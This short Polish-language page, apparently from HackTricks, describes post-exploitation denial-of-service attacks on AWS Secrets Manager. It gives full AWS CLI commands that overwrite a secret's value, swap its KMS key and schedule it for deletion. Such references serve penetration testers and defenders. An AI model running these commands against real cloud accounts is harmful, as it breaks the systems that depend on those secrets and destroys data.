AWS - Secrets Manager Post Exploitation

Wesprzyj HackTricks

Secrets Manager

Aby uzyskać więcej informacji, sprawdź:

AWS - Secrets Manager Enum

Odczytaj Tajemnice

Same tajemnice są informacjami poufnymi, sprawdź stronę privesc, aby dowiedzieć się, jak je odczytać.

DoS Zmiana Wartości Tajemnicy

Zmieniając wartość tajemnicy, możesz zrealizować atak typu DoS na wszystkie systemy zależne od tej wartości.

Zauważ, że poprzednie wartości są również przechowywane, więc łatwo jest wrócić do poprzedniej wartości.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

Zmiana klucza KMS DoS

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Usuwanie tajemnicy

Minimalna liczba dni do usunięcia tajemnicy wynosi 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Wesprzyj HackTricks

Last updated